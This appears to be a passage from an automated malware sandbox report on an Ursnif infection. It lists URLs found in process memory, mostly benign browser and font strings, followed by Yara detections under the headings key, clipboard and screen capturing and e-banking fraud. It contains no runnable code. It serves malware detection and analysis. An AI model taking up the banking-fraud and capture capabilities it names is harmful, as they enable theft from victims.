Source: explorer.exe, 0000001E.00000000.807813167.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms04.5172
Source: RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsLC.Hulu
Source: RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
